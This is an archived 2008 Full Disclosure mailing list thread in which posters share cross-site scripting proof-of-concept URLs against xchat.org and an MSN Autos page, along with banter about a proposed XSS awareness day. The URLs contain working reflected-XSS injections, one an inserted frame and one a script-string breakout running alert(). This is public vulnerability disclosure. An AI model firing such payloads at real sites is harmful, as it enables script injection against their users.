Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: XSS in XChat.org
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Sat, 19 Apr 2008 20:15:17 +0200

http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&model=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC&apos;);%7D%7Dalert('n3td3v%20sucks');%20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22%3E/

On 19/04/2008, n3td3v <xploitable () gmail com> wrote:

On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <worried () gmail com>
wrote:

http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0



--
Love,
Steve Cooperman


I've noticed an increase in web application stuff on the list since April
15th.
Please only post these on May 1st...
it will look better if the list is full of xss for one day...and send
out a bigger message to the powers that be who don't take web
application security seriously enough.

Btw, I see what you did there with the e-mail address, nice.

All the best,

n3td3v

Web Application Security Awareness Day
http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault